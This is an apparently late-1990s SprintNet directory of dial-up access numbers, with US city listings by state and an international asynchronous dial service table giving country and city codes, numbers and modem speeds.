CA 760 Palm Springs 343-3470 B
CA 650 Palo Alto 856-4854 B
CA 510 Pinole 724-0271 C
CA 909 Pomona 626-1284 C
CA 530 Redding 243-0690 B
CA 949 S B Valley 458-0811 B
CA 562 S. Fe Springs 802-2275 B
CA 916 Sacramento 851-0700 B
CA 408 Salinas 443-8791 B
CA 650 San Carlos 591-8578 B
CA 619 San Diego 233-1025 B
CA 415 San Francisco 247-9976 A
CA 408 San Jose 294-9067 B
CA 805 San Luis Obisp 543-3233 B
CA 310 San Pedro 548-7146 B
CA 415 San Rafael 499-1629 C
CA 925 San Ramon 829-6705 B
CA 714 Santa Ana 558-1501 B
CA 805 Santa Barbara 965-3326 B
CA 408 Santa Cruz 459-7735 B
CA 805 Santa Maria 348-3460 B
CA 707 Santa Rosa 523-1048 C
CA 209 Stockton 478-0402 C
CA 805 Thousand Oaks 449-1500 B
CA 805 Ventura 650-9203 B
CA 760 Victorville 951-2612 B
CA 209 Visalia 627-1201 B
CA 626 West Covina 331-6611 C
CA 818 Woodland Hills 887-7420 B

CO 719 Colorado Sprin 632-0278 B
CO 303 Denver 745-3285 A
CO 970 Ft Collins 495-6799 B
CO 970 Grand Junction 241-3004 B
CO 970 Greeley 352-8563 B
CO 719 Pueblo 542-4053 B

CT 203 Bridgeport 332-7400 B
CT 203 Danbury 778-2022 B
CT 860 Hartford 560-1385 B
CT 203 New Haven 624-5945 B
CT 860 New London 440-0656 B
CT 203 Stamford 961-8371 B
CT 203 Waterbury 759-1445 C

DC 202 Washington 659-2733 A

DE 302 Dover 678-8328 B
DE 302 Newark 292-0114 B

FL 561 Boca Raton 367-0732 B
FL 941 Cape Coral 334-0071 C
FL 407 Cocoa Beach 267-0800 B
FL 954 Ft Lauderdale 764-0318 B
FL 561 Ft Pierce 466-4566 B
FL 352 Gainesville 335-6697 B
FL 904 Holly Hill 252-1609 B
FL 904 Jacksonville 353-1137 B
FL 941 Lakeland 680-3332 C
FL 352 Leesburg 787-0799 B
FL 407 Melbourne 725-9641 B
FL 305 Miami 358-5349 A
FL 941 Naples 263-3033 C
FL 352 Ocala 351-3790 B
FL 407 Orlando 246-0851 B
FL 850 Panama City 763-8377 B
FL 850 Pensacola 469-9688 C
FL 954 Pompano Beach 941-5445 B
FL 941 Sarasota 952-1152 C
FL 727 St Petersburg 327-7024 B
FL 850 Tallahassee 222-0533 B
FL 813 Tampa 221-3713 B
FL 850 Valparaiso 897-3421 B
FL 561 West Palm Beac 820-9391 B

GA 912 Albany 431-3113 C
GA 706 Athens 548-9698 B
GA 404 Atlanta 688-1212 A
GA 706 Augusta 722-9877 B
GA 706 Columbus 322-9386 B
GA 770 Gainsville 532-9880 B
GA 912 Macon 741-2108 C
GA 706 Rome 234-1428 B
GA 912 Savannah 236-2898 B

HI 808 Oahu 536-3886 (1)

IA 515 Ames 233-2603 C
IA 319 Burlington 752-2516 B
IA 319 Cedar Rapids 298-4600 B
IA 319 Davenport 322-3361 C
IA 319 Debuque 556-0783 C
IA 515 Des Moines 288-4626 B
IA 319 Iowa City 339-0320 C
IA 712 Sioux City 255-1545 C
IA 319 Waterloo 232-0195 B

ID 208 Boise 343-0957 B
ID 208 Idaho Falls 529-0406 B
ID 208 Lewiston 743-5885 C
ID 208 Pocatello 232-1764 B

IL 847 Arlington Heig 670-9522 B
IL 630 Aurora 896-9802 B
IL 618 Belleville 277-9551 B
IL 309 Bloomington 828-1441 B
IL 312 Chicago 938-5462 A
IL 815 De Kalb 756-3455 B
IL 217 Decatur 429-6054 C
IL 847 Glencoe 835-1143 B
IL 815 Joliet 722-9652 C
IL 708 Lansing 474-9310 B
IL 847 Libertyville 362-5718 B
IL 630 Naperville 355-2910 B
IL 309 Peoria 674-2344 B
IL 815 Rockford 962-9523 B
IL 217 Springfield 525-1590 B
IL 217 Urbana 384-3322 B

IN 812 Bloomington 331-8890 C
IN 812 Evansville 422-2911 B
IN 219 Ft Wayne 422-8013 B
IN 219 Gary 881-1020 B
IN 317 Indianapolis 299-2593 B
IN 765 Kokomo 452-0073 C
IN 765 Lafayette 742-5488 C
IN 765 Muncie 288-1113 C
IN 765 Richmond 935-7532 B
IN 219 South Bend 288-2355 B
IN 812 Terre Haute 235-5671 C

KS 785 Lawrence 843-8124 B
KS 913 Leavenworth 651-0015 B
KS 785 Manhattan 537-0948 B
KS 785 Salina 825-7900 B
KS 785 Topeka 232-5507 B
KS 316 Wichita 264-4211 B

KY 502 Bowling Green 843-0632 B
KY 502 Frankfort 875-2911 B
KY 606 Lexington 231-7717 B
KY 502 Louisville 583-1209 B
KY 502 Owensboro 686-8107 B

LA 318 Alexandria 445-1053 B
LA 225 Baton Rouge 344-5105 A
LA 318 Lafayette 233-6951 B
LA 318 Lake Charles 436-0518 C
LA 318 Monroe 345-0106 B
LA 504 New Orleans 524-7442 A
LA 318 Shreveport 424-2255 B

MA 508 Attleboro 226-8956 B
MA 617 Boston 338-0002 A
MA 508 Brockton 583-3533 B
MA 781 Dedham 326-4064 B
MA 508 Fall River 677-4477 B
MA 508 Framingham 620-1119 B
MA 978 Lawrence 687-8252 B
MA 781 Lexington 862-9124 B
MA 978 Lowell 459-2350 B
MA 508 New Bedford 990-3300 B
MA 413 Northhampton 586-0510 C
MA 413 Pittsfield 499-7741 B
MA 978 Salem 744-1559 B
MA 413 Springfield 747-3700 B
MA 508 Woods Hole 540-4085 C
MA 508 Worcester 791-7630 B

MD 410 Annapolis 266-6851 B
MD 410 Baltimore 244-0470 A
MD 301 Frederick 293-9596 B
MD 301 Gaithersburg 869-4191 A

ME 207 August 622-7364 B
ME 207 Brewer 973-0700 C
ME 207 Lewiston 784-0105 C
ME 207 Portland 791-2400 C

MI 734 Ann Arbor 741-8488 A
MI 616 Battle Creek 961-9927 B
MI 616 Bridgman 465-3248 B
MI 313 Detroit 965-3011 A
MI 810 Flint 767-3590 B
MI 616 Grand Rapids 774-5958 B
MI 517 Jackson 782-8111 C
MI 616 Kalamazoo 381-3101 B
MI 517 Lansing 482-0120 B
MI 906 Marquette 228-4622 B
MI 517 Midland 832-7068 B
MI 616 Muskegon 726-5723 C
MI 248 Pontiac 858-7109 B
MI 810 Port Huron 982-8364 B
MI 517 Saginaw 797-3822 B
MI 248 Southfield 827-4710 B
MI 616 Traverse City 946-2121 B
MI 810 Warren 573-7300 B
MI 734 Wayne 326-4210 B

MN 218 Duluth 722-3029 B
MN 507 Mankato 388-3780 B
MN 612 Minneapolis 332-0033 A
MN 507 Rochester 282-0555 C
MN 320 St Cloud 253-1264 C

MO 573 Columbia 499-0580 B
MO 573 Jefferson City 634-8436 C
MO 816 Kansas City 421-5783 A
MO 417 Springfield 831-0057 B
MO 314 St. Charles 723-5179 B
MO 816 St Joseph 279-4797 C
MO 314 St Louis 421-1376 A

MS 228 Gulfport 863-0024 B
MS 601 Hattiesburg 264-0815 B
MS 601 Jackson 354-5303 B
MS 601 Meridian 482-2210 B
MS 601 Port Gibson 437-8916 B
MS 601 Starkville 324-2155 B

MT 406 Billings 248-6373 C
MT 406 Great Falls 771-0067 B
MT 406 Helena 443-0527 B
MT 406 Missoula 543-5575 C

NC 828 Asheville 259-9945 B
NC 336 Burlington 229-0032 B
NC 704 Charlotte 332-4023 A
NC 910 Fayetteville 323-5940 C
NC 704 Gastonia 865-4708 B
NC 336 Greensboro 299-6600 B
NC 828 Hickory 326-9860 B
NC 336 High Point 889-7494 B
NC 336 N.Wilkesboro 838-1663 C
NC 919 Raleigh 781-9976 B
NC 919 Res Tri Park 549-0542 B
NC 252 Tarboro 823-7459 C
NC 910 Wilmington 763-8292 C
NC 336 Winston-Salem 785-9962 B

ND 701 Grand Forks 775-7813 B
ND 701 Fargo 235-9069 C
ND 701 Mandan 663-6339 C

NE 308 Grand Island 381-2049 B
NE 402 Lincoln 438-4305 B
NE 402 Omaha 341-4622 B

NH 603 Concord 225-2566 B
NH 603 Durham 868-2924 B
NH 603 Manchester 647-2750 B
NH 603 Nashua 880-0118 C
NH 603 Portsmouth 431-7984 B

NJ 609 Atlantic City 348-3233 B
NJ 732 Freehold 780-2680 B
NJ 201 Hackensack 488-1726 B
NJ 609 Marlton 988-7800 B
NJ 609 Merchantville 663-7730 B
NJ 973 Morristown 605-1836 B
NJ 732 New Brunswick 220-0405 B
NJ 973 Newark 624-8843 A
NJ 973 Passaic 777-2700 B
NJ 973 Paterson 279-4515 B
NJ 609 Princeton 799-2266 A
NJ 732 Rahway 388-5288 B
NJ 732 Redbank 571-0003 B
NJ 973 Roseland 227-6722 B
NJ 732 Sayreville 525-9507 B
NJ 973 Summit 701-0767 B
NJ 609 Trenton 392-4100 B
NJ 609 Vineland 696-3883 B

NM 505 Albuquerque 246-8950 B
NM 505 Las Cruces 529-9191 B
NM 505 Santa Fe 473-3403 C

NV 702 Las Vegas 737-1752 B
NV 702 Reno 824-3000 B

NY 518 Albany 433-0092 B
NY 607 Binghamton 773-2244 B
NY 716 Buffalo 847-8181 B
NY 516 Deer Park 254-6021 B
NY 516 Hempstead 292-2820 B
NY 607 Ithaca 273-2200 C
NY 212 New York City 206-0256 A
NY 716 Niagara Falls 282-3284 B
NY 518 Plattsburgh 562-1890 C
NY 914 Poughkeepsie 471-6728 B
NY 716 Rochester 546-6998 B
NY 315 Syracuse 448-0021 B
NY 315 Utica 792-9962 B
NY 914 White Plains 949-6878 B

OH 330 Canton 455-1700 B
OH 513 Cincinnati 579-1593 A
OH 216 Cleveland 575-0811 A
OH 614 Columbus 461-8671 A
OH 937 Dayton 461-4600 B
OH 440 Elyria 322-8645 C
OH 419 Findley 422-8188 B
OH 513 Hamilton 863-4116 B
OH 330 Kent 678-8330 A
OH 440 Lorain 960-1771 C
OH 419 Mansfield 589-0276 C
OH 419 Sandusky 627-0050 B
OH 937 Springfield 324-1520 B
OH 419 Toledo 255-7010 B
OH 330 Warren 856-7265 C
OH 330 Wooster 345-1023 B
OH 330 Youngstown 743-2983 B

OK 918 Bartlesville 336-6362 B
OK 580 Lawton 353-0225 B
OK 405 Oklahoma City 270-0028 B
OK 405 Stillwater 743-1447 B
OK 918 Tulsa 584-6935 B

OR 541 Corvallis 754-0559 C
OR 541 Eugene 683-5147 B
OR 541 Hood River 386-4405 C
OR 541 Klamath Falls 882-6282 B
OR 541 Medford 772-3994 B
OR 503 Portland 295-0337 A
OR 503 Salem 375-3104 B

PA 814 Altoona 949-0310 B
PA 724 Butler 285-8721 B
PA 717 Carlisle 249-9311 C
PA 717 Danville 271-3840 C
PA 814 Erie 459-9779 B
PA 724 Greenburg 836-4771 B
PA 717 Harrisburg 221-1500 B
PA 814 Johnstown 535-3356 B
PA 610 King of Prussi 265-2812 B
PA 717 Lancaster 295-7128 C
PA 215 Levittown 946-3469 B
PA 412 Monroeville 380-5100 B
PA 215 Philadelphia 854-0589 A
PA 412 Pittsburgh 281-8326 A
PA 610 Reading 607-8500 B
PA 717 Scranton 341-5611 B
PA 814 State College 231-1510 C
PA 215 Warrington 491-6800 B
PA 610 West Chester 436-7406 B
PA 610 Whitehall 770-2244 C
PA 717 Williamsport 494-5500 C
PA 717 Wilkes-Barre 820-9755 B
PA 717 York 845-9717 B

RI 401 Newport 849-0229 B
RI 401 North Kingston 295-7100 B
RI 401 Providence 453-5353 B
RI 401 Woonsocket 765-0019 B

SC 843 Charleston 723-7342 B
SC 803 Columbia 254-0038 B
SC 843 Florence 669-0042 B
SC 864 Greenville 232-7832 B
SC 843 Myrtle Beach 626-9134 B
SC 864 Spartanburg 542-1653 B

SD 605 Pierre 224-2257 B
SD 605 Rapid City 348-2048 B
SD 605 Sioux Falls 334-4953 B

TN 423 Bristol 968-2480 C
TN 423 Chattanooga 266-3066 B
TN 931 Clarksville 552-0032 B
TN 423 Johnson City 282-6645 C
TN 423 Knoxville 523-4031 B
TN 901 Memphis 525-5201 B
TN 615 Nashville 726-1213 B
TN 423 Oak Ridge 481-3590 B

TX 915 Abilene 672-3902 B
TX 806 Amarillo 373-2926 B
TX 903 Athens 677-1712 C
TX 512 Austin 929-0078 B
TX 956 Brownsville 544-7073 C
TX 409 Bryan 779-0713 C
TX 512 Corpus Christi 888-7207 B
TX 214 Dallas 653-0840 A
TX 940 Denton 381-1897 C
TX 915 El Paso 532-1912 B
TX 817 Ft Worth 332-1015 A
TX 409 Galveston 762-8076 B
TX 713 Houston 228-0705 A
TX 956 Laredo 724-1791 C
TX 903 Longview 758-1161 C
TX 806 Lubbock 765-9631 B
TX 956 McAllen 631-8967 B
TX 915 Midland 561-8931 B
TX 409 Nederland 722-7162 B
TX 915 San Angelo 944-0376 B
TX 210 San Antonio 225-1191 B
TX 903 Sherman 893-4995 B
TX 254 Temple 773-9723 C
TX 903 Texarkana 794-4700 B
TX 903 Tyler 597-8925 C
TX 512 Victoria 572-3197 B
TX 254 Waco 752-2681 C
TX 940 Wichita Falls 322-3774 B

UT 435 Logan 752-3421 B
UT 801 Ogden 627-1640 C
UT 801 Provo 371-0278 B
UT 801 Salt Lake City 355-9030 B

VA 540 Blacksburg 552-9181 B
VA 804 Charlottesvill 977-5330 C
VA 540 Covington 962-2217 B
VA 540 Fredericksburg 371-0188 B
VA 540 Harrisonburg 434-0374 C
VA 703 Herndon 787-6719 B
VA 804 Lynchburg 845-0010 C
VA 757 Newport News 596-9232 B
VA 757 Norfolk 626-3349 B
VA 703 Occoquan 494-0836 B
VA 804 Richmond 225-0021 B
VA 540 Roanoke 857-4266 B

VT 802 Burlington 660-4795 B
VT 802 Montpelier 223-0758 B
VT 802 Rutland 775-1676 C
VT 802 White River 295-7631 C

WA 253 Auburn 939-9982 B
WA 360 Bellingham 733-2873 B
WA 425 Everett 774-7466 C
WA 360 Longview 577-3992 B
WA 360 Olympia 705-0769 C
WA 509 Pullman 332-0172 B
WA 509 Richland 943-6117 B
WA 206 Seattle 625-1386 A
WA 509 Spokane 747-2069 B
WA 253 Tacoma 383-9488 B
WA 360 Vancouver 693-6914 B
WA 509 Wenatchee 663-9482 B
WA 509 Yakima 575-1060 B

WI 608 Beloit 362-5287 B
WI 715 Eau Claire 836-0097 C
WI 920 Green Bay 432-0346 B
WI 608 La Crosse 784-0560 B
WI 608 Madison 257-8330 B
WI 414 Milwaukee 271-2420 A
WI 920 Neenah 731-1560 B
WI 715 Wausau 848-6044 B

WV 304 Charleston 346-0524 B
WV 304 Clarksburg 622-6827 B
WV 304 Huntington 523-2802 C
WV 304 Morgantown 292-0492 C
WV 304 Wheeling 233-7732 B

WY 307 Casper 265-8807 C
WY 307 Cheyenne 637-3958 B
WY 307 Laramie 721-5878 B

(1) International data rates apply.

(2) Service is provided by GCI. Access is restricted to collect calls
to U.S. hosts connected to the SprintNet global data network. If
prepaid access is required, contact a Sprint representative. For
sign-on information, call SprintNet Customer Service at
1-800/877-5045 or 404/649-4970. International data rates apply.


]B[ INTERNATIONAL ASYNCHRONOUS DIAL SERVICE


Updated June 30, 1998

- for asynchronous applications
- at 300, 1200, 2400, 9600 and 14400 bps
- with optional local error protection in select locations
- from locations around the globe

Now overseas locations are being enhanced to include local SprintNet Access
Centers. These new centers provide direct access to the SprintNet global
data network using the same sign-on procedures you use in the United States.
So, no matter where you are, you'll have the same high quality SprintNet
service. Please see footnotes for specific exceptions.

The Customer Service number for users calling outside of the United States is
703-318-7740. The United States Customer Service number is 800-827-4685 #1.


International Service Requirements
----------------------------------
SPEED: MODEM TYPE:
300 bps V.21 compatible
1200 bps V.22 compatible
2400 bps V.22 bis compatible
9600 bps CCITT V.32 compatible
14400 bps V.32 bis compatible



NOTE: o ALL COUNTRY CODES DO NOT NEED TO BE DIALED WHEN DIALING WITHIN
COUNTRY
o CITY CODES WITHIN PARENTHESES () DO NOT NEED TO BE DIALED WHEN
DIALING WITHIN COUNTRY

INTERNATIONAL ASYNCHRONOUS DIAL SERVICE
---------------------------------------------------------------------

COUNTRY CITY DIAL
COUNTRY CODE CODE NUMBER SPEED
-----------------------------------------------------------------------
Australia+,*** 61
Adelaide+ 8 8232-5941 Up to 14400bps
Brisbane+ 7 33-91-0719 Up to 14400bps
Canberra+ 6 257-5055 Up to 14400bps
Melbourne+ 3 9663-8622 Up to 14400bps
Perth+ 8 9481-1122 Up to 14400bps
Sydney+ 2 9281-0800 Up to 14400bps
Austria 43
Vienna 1 504-2811 Up to 14400bps
Belarus+^ 7
Minsk+ 0172 26-0812 Up to 2400bps
Belgium 32
Antwerp 3++ 234-2700 Up to 14400bps
Brussels 2 725-3400 Up to 14400bps
Brazil 55
Belo Horizonte 31 2911900 Up to 14400bps
Sao Paulo 11 5070-7999 Up to 14400bps
Bulgaria 359
Burgas*+ 0133 Up to 9600bps
Burgas+ 56 99626 Up to 9600bps
Interpred*+ 0133 Up to 9600bps
Interpred+ 2 7146-4444 Up to 14400bps
Plovdiv+ 32 264-497 Up to 9600bps
Russe*+ 0133 Up to 9600bps
Sofia*+ 0133 Up to 14400bps
Sofia+ 2 91-129 Up to 14400bps
Stara Zagora*+ 0133 Up to 9600bps
Veliko Tarnovo*+ 0133 Up to 9600bps
Varna*+ 0133 Up to 9600bps
Varna+ 52 601842 Up to 14400bps
Vratza*+ 0133 Up to 9600bps
Canada 1

Calgary+ 403 262-7887 Up to 14400bps
Dartmouth**+ 902 492-0036 Up to 14400bps
Halifax**+ 902 492-0036 Up to 14400bps
Montreal**+ 514 392-0202 Up to 14400bps
Ottawa+ 613 235-6481 Up to 14400bps
Pointe Claire**+ 514 392-0202 Up to 14400bps
Toronto+ 416 594-1121 Up to 14400bps
Vancouver+ 604 684-4696 Up to 14400bps
Chile
Santiago 56 2 365-1110 Up to 14400bps
Colombia 57
Bogota+ 1 623-5866 Up to 14400bps
Czech Republic 420
Prague 2 7077-7777 Up to 19200bps
Denmark+ 45
Copenhagen+ 35 439-111 Up to 9600bps
Egypt 20
Cairo 2 3382400 Up to 14400bps
Estonia+^ 372
Tallinn+> 3726 631-2286 Up to 2400bps
Finland 358
Helsinki 9 146-3022 Up to 14400bps
France~ 33
Lille 3 2065-3260 Up to 14400bps
Lyon 4 7864-5095 Up to 14400bps
Paris 1 4643-0505 Up to 14400bps
Sofia Antipolis 4 9296-0049 Up to 14400bps
Germany++ 49
Dusseldorf 211 323-8570 Up to 14400bps
Frankfurt 69 666-9151 Up to 14400bps
Hamburg 40 310-180 Up to 14400bps
Munich+ 89 291-62800 Up to 14400bps
Stuttgart 71 181-2001 Up to 14400bps
Greece 30
Athens+ 1 957-8020 Up to 14400bps
Guam 671
Tumon 649-3282 Up to 14400bps
Hong Kong 852
Hong Kong 300-26442 Up to 14400bps
Hungary 36
Budapest+ 1 3351023 Up to 14400bps
Indonesia 62
Jakarta+ 21 386-1044 Up to 14400bps
Ireland 353
Cork 21 319 699 Up to 14400bps
Dublin 1 661 4466 Up to 14400bps
Galway 91 561 177 Up to 14400bps
Israel 972
Tel Aviv + Rosh Haayin 3 900-1234 Up to 14400bps
Italy 39
Milan 2 76110219 Up to 14400bps
Rome 6 23239400 Up to 14400bps
Japan 81
Nagoya+ 52 586-7021 Up to 14400bps
Niigata+ 25 246-4095 Up to 14400bps
Osaka 6 534-8700 Up to 14400bps
Tokyo 3 3794-6381 Up to 14400bps
Fukuoka+ 92 623-1253 Up to 14400bps
Hiroshima+ 82 227-9139 Up to 14400bps
Sapporo+ 11 752-0620 Up to 14400bps
Sendai+ 22 216-7326 Up to 14400bps
Takamatsu+ 878++ 23-4866 Up to 14400bps
Toyama+ 764 33-4807 Up to 14400bps
Yokohama+ 45 451-0425 Up to 14400bps
Jordan 962
Amman 6 700-701 Up to 14400bps
Kazakhstan+^ 7
Akmola+ 3172 333618 Up to 9600bps
Aktau+ 3292 514959 Up to 9600bps
Aktyubinsk+ 3132 574641 Up to 14400bps
Alma-Ata+ 3272 507000 Up to 14400bps
Atyrau+ 31222 24647 Up to 9600bps
Chimkent+ 3252 445221 Up to 9600bps
Jambul+ 32622 47616 Up to 9600bps
Jezkazgan+ 3102 769502 Up to 14400bps
Karaganda+ 3212 431112 Up to 14400bps
Kokshetau 31622 57000 Up to 14400bps
Kulsary 31237 21818 Up to 9600bps
Kustanai+ 3142 546926 Up to 14400bps
Kyzyl-Orda 32422 70265 Up to 9600bps
Pavlodar+ 3182 327707 Up to 14400bps
Petropavlovsk+ 3152 469909 Up to 14400bps
Semipalatinsk+ 3222 661303 Up to 9600bps
Taldykurgan+ 32822 45221 Up to 14400bps
Uralsk+ 31122 20684 Up to 9600bps
Ust-Kamenogorsk+ 3232 645906 Up to 9600bps
Korea (South) 82

Changwon+ 551 96-9944 Up to 14400bps
Chuncheon+ 361 262-1496 Up to 14400bps
Chungju+ 431 292-2101 Up to 2400bps
Incheon+ 32 868-3395 Up to 14400bps
Jeonju+ 652 75-1135 Up to 14400bps
Jeju+ 64 55-7671 Up to 2400bps
Kangreung+ 391 43-3671 Up to 2400bps
Kwangju+ 62 226-3085 Up to 14400bps
Kwangyang+ 667 791-2277 Up to 14400bps
Pohang+ 562 75-3115 Up to 14400bps
Pusan+ 51 441-8555 Up to 14400bps
Seoul 2 551-4525 Up to 14400bps
Suwon+ 331 254-4955 Up to 2400bps
Taejun 42 533-7500 Up to 14400bps
Teagu+ 53 475-0075 Up to 14400bps
Ulsan+ 522 258-1818 Up to 14400bps
Kuwait+ 965

Kuwait City+ 484-4155 Up to 9600bps
Kyrgystan 7
Bishkek+ 3312 216706 Up to 9600bps
Latvia+^ 7
Riga+ 013 722-3811 Up to 2400bps
Lithuania+++ 370
Kaunas+ 7 206373 Up to 14400bps
Klaipeda+ 6 310690 Up to 14400bps
Vilnius+ 2 73-4133 Up to 14400bps
Luxembourg 352
Strassen 31-6667 Up to 14400bps
Malaysia 60
Kuala Lumpur+ 3 7329372 Up to 14400bps
Penang+ 4 3971526 Up to 14400bps
Mexico 52

Chihuahua 14 118-522 Up to 14400bps
Coatzacoalcos 921 43-209 Up to 14400bps
Culiacan 67 520-303 Up to 14400bps
Guadalajara+ 3 678-1500 Up to 14400bps
Hermosillo 62 106-033 Up to 14400bps
Juarez+ 16 29-3200 Up to 14400bps
Leon 47 710-225 Up to 14400bps
Mazatlan 69 803-025 Up to 14400bps
Mexico City+ 5 729-5200 Up to 14400bps
Monterrey+ 83 99-0700 Up to 14400bps
Puebla+ 22 29-1900 Up to 14400bps
Reynosa 89 246-804 Up to 14400bps
Tijuana+ 66 86-1372 Up to 14400bps
Torreon 17 501-181 Up to 14400bps
Tuxtla 961 273-07 Up to 14400bps
Veracruz 29 319-161 Up to 14400bps
Netherlands 31
Amsterdam*** 20 6533533 Up to 14400bps
New Zealand+ 64
Auckland+ 9 379-0335 Up to 14400bps
Wellington+ 4 499-3617 Up to 14400bps
Norway 47
Oslo 22 595700 Up to 14400bps
Peru 51
Lima+ 1 221-7747 Up to 14400bps
Philippines 63
Manilla^^+ 2 760-1700 Up to 14400bps
Portugal 351
Lisbon 1 315-2508 Up to 9600bps
Porto 2 8302141 Up to 9600bps
Puerto Rico 1
San Juan 787 273-7400 Up to 14400bps
Russia+ 7
Abakan+ 39022 5-1210 Up to 9600bps
Akademgorodok+ 3832 36-0470 Up to 2400bps
Alexandrov 09244 22181 Up to 9600bps
Angarsk^+ >>> 83951 562121 Up to 2400bps
Aniva+ 42441 5-2757 Up to 2400bps
Arkhangelsk^+ 8182 65-0608 Up to 2400bps
Astrakhan+ 8512 391355 Up to 2400bps
Bagan+ >> 253 9-1226 Up to 2400bps
Barabinsk+ >> 2612 5006 Up to 2400bps
Barnaul^+ 3852 26-1601 Up to 9600bps
Belebei 34716 31594 Up to 9600bps
Belgorod+ 0722 27-3201 Up to 9600bps
Beloretzk+ 34792 5-0510 Up to 9600bps
Berdsk+ >> 241 3-2012 Up to 2400bps
Birobidjan+ 42622 4-0137 Up to 2400bps
Birsk 34714 49744 Up to 9600bps
Biysk^+ 3854 24-2410 Up to 2400bps
Blagoveschensk 4162 426268 Up to 9600bps
Bolotnoe 249 22303 Up to 9600bps
Bratsk^+ < 3953 42-0620 Up to 2400bps
Chany+ >> 267 2-1072 Up to 2400bps
Cheboksary+ 8350 21-4656 Up to 2400bps
Chelyabinsk+ 3512 66-4007 Up to 14400bps
Cherepanovo+ 3832 2-4674 Up to 2400bps
Cherepovets 8202 223444 Up to 2400bps
Cherkessk+ 87822 5-0579 Up to 2400bps
Chistoozernoe+ >> 268 9-1886 Up to 2400bps

Chita^+ 3022 328276 Up to 2400bps
Chulym+ >> 250 3-9512 Up to 2400bps
Dovolnoe+ >> 254 21174 Up to 2400bps
Durtuli 34717 21752 Up to 2400bps
Eisk^+ 86132 4-6153 Up to 2400bps
Ekaterinburg^+ 3432 49-5356 Up to 2400bps
Elista 84772 60645 Up to 14400bps
Gorno-Altaisk+ 38822 3-1099 Up to 2400bps
Gorokhovec 09238 22822 Up to 2400bps
Gus-Khrustalny 09241 27900 Up to 9600bps
Irkutsk^+ 3952 25-5191 Up to 2400bps
Ishim+ 251 2-1222 Up to 14400bps
Iskitim+ >> 243 21246 Up to 2400bps
Izhevsk+ 3412 51-0347 Up to 14400bps
Kaliningrad+ 0112 349288 Up to 2400bps
Kameshkovo 09248 23573 Up to 9600bps
Kamensk-Shakhtinsky 86365 5-5045 Up to 2400bps
Karasuk+ >> 255 5-1508 Up to 2400bps
Kargat+ >> 265 22502 Up to 2400bps
Kazan+ 8432 38-7344 Up to 9600bps
Kemerovo+ 3842 52-8601 Up to 2400bps
Khabarovsk^+ 4212 21-4937 Up to 2400bps
Kholmsk 4243 60660 Up to 14400bps
Kirov+ 8332 6-0660 Up to 14400bps
Kirzhach 09237 23315 Up to 2400bps
Kochenevo 2512 42000 Up to 9600bps
Kochki+ >> 256 2-2864 Up to 2400bps
Kolchugino 09245 93900 Up to 14400bps
Kolivan 252 21703 Up to 2400bps
Komsomolsk na Amure^+ 42172 47145 Up to 2400bps
Kondopoga+ 82251 2-0379 Up to 2400bps

Korsakov 42435 2-2222 Up to 2400bps
Kovrov 09232 21242 Up to 9600bps
Krasnodar^+ 8612 546614 Up to 2400bps
Krasnoobsk 3832 480716 Up to 2400bps
Krasnoozersk+ >> 257 4-1064 Up to 2400bps
Krasnouralsk+ 34343 2-0803 Up to 2400bps
Krasnoyarsk^+ 3912 66-1444 Up to 2400bps
Kujbyshev+ >> 262 2-4196 Up to 2400bps
Kupino+ >> 258 2-1448 Up to 2400bps
Kurgan^+ 35222 7-1601 Up to 2400bps
Kurilsk 42454 21280 Up to 2400bps
Kursk+ 0712 56-5846 Up to 2400bps
Kyshtovka+ >> 271 2-1583 Up to 2400bps
Magnitogorsk+ 3511 37-6471 Up to 2400bps
Maikop+ 87722 3-4652 Up to 2400bps
Maslyanino+ >> 247 21371 Up to 2400bps
Melenki 09247 22420 Up to 9600bps
Meleuz^+ 34764 4-0008 Up to 9600bps
Mesyagutovo 34798 21071 Up to 2400bps
Moscow+ 095 928-0985 Up to 14400bps
Moshkovo+ >> 248 2-1694 Up to 2400bps
Murmansk+ 8152 286692 Up to 2400bps
Murom 09234 32095 Up to 2400bps
Nakhodka^+ 4236 642710 Up to 9600bps
Nalchik+ 86622 7-3538 Up to 2400bps
Narjan-Mar+ 81853 6-3721 Up to 2400bps
Neftekamsk^+ 34713 5-7301 Up to 2400bps
Nevelsk 42436 60155 Up to 2400bps
Nizhnevartovsk+ 3466 24-1555 Up to 2400bps
Niznij Novgorod^+ 8312 67-7710 Up to 2400bps
Niznij Tagil+ 3435 25-2947 Up to 14400bps
Norilsk+ 3919 46-1112 Up to 2400bps
Novgorod+ 8162 131837 Up to 9600bps
Novocherkassk+ 86352 4-3455 Up to 2400bps
Novokuznetsk+ 3843 42-4081 Up to 2400bps
Novorossijsk^+ 86134 5-2747 Up to 2400bps
Novosibirsk^+ 3832 18-0060 Up to 2400bps
Obj+ >> 273 21893 Up to 2400bps
Okha+ 42437 2-2585 Up to 2400bps
Oktyabrskij^+ 34767 4-3831 Up to 9600bps
Omsk^+ 3812 23-7310 Up to 2400bps
Ordynsk+ >> 259 21099 Up to 2400bps
Orel+ 0862 771462 Up to 2400bps
Orenburg+ 3532 565008 Up to 14400bps
P.Kamchatsky^+ 4150 11-2505 Up to 2400bps
Pechora+ 82142 30922 Up to 2400bps
Penza+ 8412 55-3962 Up to 2400bps
Perm^+ 3422 90-0320 Up to 14400bps
Petrozavodsk^+ 8142 764160 Up to 2400bps
Petushki 09243 23896 Up to 9600bps
Pskov 8112 91773 Up to 9600bps
Pyatigorsk+ 86533 4-1037 Up to 9600bps
Rostov^+ 8632 65-7420 Up to 2400bps
Rubtsovsk+ 38557 24774 Up to 2400bps
Ryazan+ 0912 779172 Up to 9600bps
Salavat^+ 34763 2-4322 Up to 9600bps
Salsk+ 86372 3-1040 Up to 2400bps
Samara^+ 8462 704031 Up to 2400bps
Saratov^+ 8452 50-0499 Up to 14400bps
Selivanovo 09236 21510 Up to 2400bps
Serov+ 34315 2-0865 Up to 14400bps
Severnoe 260 22235 Up to 2400bps
Severodvinsk+ 81842 3-3322 Up to 2400bps
Shakhty+ 86362 2-3055 Up to 2400bps
Sibaj+ 34775 3-4250 Up to 2400bps
Smolensk 8122 30616 Up to 9600bps
Sobinka 09242 25150 Up to 2400bps
Sochi^+ 8622 99-9550 Up to 14400bps
Sortavala+ 81430 4-3388 Up to 2400bps
South Kurilsk+ 42455 2-2145 Up to 2400bps
South Sakhalinsk^+ 4242 72-7111 Up to 2400bps
St Petersburg^+ 812 110-7792 Up to 9600bps
Stavropol+ 8652 26-2790 Up to 2400bps
Sterlitamak^+ 3473 25-5161 Up to 9600bps
Sudogda 09235 21700 Up to 2400bps
Surgut 3462 77-5400 Up to 9600bps
Suzdal 09231 20289 Up to 2400bps
Suzun+ >> 246 2-1818 Up to 2400bps
Syktyvkar+ 8212 21-1979 Up to 2400bps
